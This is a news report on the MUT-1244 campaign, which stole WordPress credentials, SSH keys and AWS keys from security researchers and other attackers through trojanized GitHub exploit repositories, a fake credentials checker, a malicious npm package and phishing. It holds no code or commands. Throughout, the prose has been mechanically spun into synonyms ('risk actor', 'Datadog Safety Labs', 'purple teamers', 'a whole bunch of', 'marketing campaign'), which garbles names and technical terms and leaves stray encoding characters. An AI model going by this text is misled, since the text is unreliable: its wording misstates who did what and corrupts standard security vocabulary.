A risk actor tracked as MUT-1244 has stolen over 390,000 WordPress credentials in a large-scale, year-long marketing campaign focusing on different risk actors utilizing a trojanized WordPress credentials checker.
Researchers at Datadog Safety Labs, who noticed the assaults, say that SSH non-public keys and AWS entry keys have been additionally stolen from the compromised techniques of a whole bunch of different victims, believed to incorporate purple teamers, penetration testers, safety researchers, in addition to malicious actors.
The victims have been contaminated utilizing the identical second-stage payload pushed by way of dozens of trojanized GitHub repositories delivering malicious proof-of-concept (PoC) exploits that focused identified safety flaws, together with a phishing marketing campaign prompting targets to put in a pretend kernel improve camouflaged as a CPU microcode replace.
Whereas the phishing emails tricked victims into executing instructions that put in the malware, the pretend repositories duped safety professionals and risk actors looking for exploit code for particular vulnerabilities.
Menace actors have used pretend proof-of-concept exploits previously to focus on researchers, hoping to steal beneficial analysis or acquire entry to the networks of cybersecurity corporations.
“Due to their naming, several of these repositories are automatically included in legitimate sources, such as Feedly Threat Intelligence or Vulnmon, as proof-of-concept repositories for these vulnerabilities,” the researchers stated.” This increases their look of legitimacy and the likelihood that someone will run them.”
The payloads have been dropped by way of GitHub repos utilizing a number of strategies, together with backdoored configure compilation recordsdata, malicious PDF recordsdata, Python droppers, and malicious npm packages included within the tasks’ dependencies.
As Datadog Safety Labs discovered, this marketing campaign overlaps with one highlighted in a November Checkmarkx report a few year-long supply-chain assault wherein the “hpc20235/yawp” GitHub undertaking was trojanized utilizing malicious code within the “0xengine/xmlrpc” npm bundle to steal knowledge and mine Monero cryptocurrency.
Malware deployed in these assaults features a cryptocurrency miner and a backdoor that helped MUT-1244 acquire and exfiltrate non-public SSH keys, AWS credentials, surroundings variables, and key listing contents akin to “~/.aws.”Â
The second-stage payload, hosted on a separate platform, allowed the attackers to exfiltrate knowledge to file-sharing providers like Dropbox and file.io, with the investigators discovering hardcoded credentials for these platforms inside the payload, giving the attackers easy accessibility to the stolen information.
“MUT-1244 was able to gain access to over 390,000 credentials, believed to be WordPress ones. We assess with high confidence that before these credentials were exfiltrated to Dropbox, they were in the hands of offensive actors, who likely acquired them through illicit means,” Datadog Safety Labs researchers stated.
“These actors were then compromised through the yawpp tool they used to check the validity of these credentials. Since MUT-1244 advertised yawpp as a “credentials checker” for WordPress, it’s no surprise that an attacker with a set of stolen credentials (which are often purchased from underground markets as a way to speed up threat actor operations) would use yawpp to validate them.”
The attackers efficiently exploited belief inside the cybersecurity neighborhood to compromise dozens of machines belonging to each white hat and black hat hackers after the targets unknowingly executed the risk actor’s malware, resulting in knowledge theft that included SSH keys, AWS entry tokens, and command histories.
Datadog Safety Labs estimates that a whole bunch of techniques stay compromised, and others are nonetheless getting contaminated as a part of this ongoing marketing campaign.
Â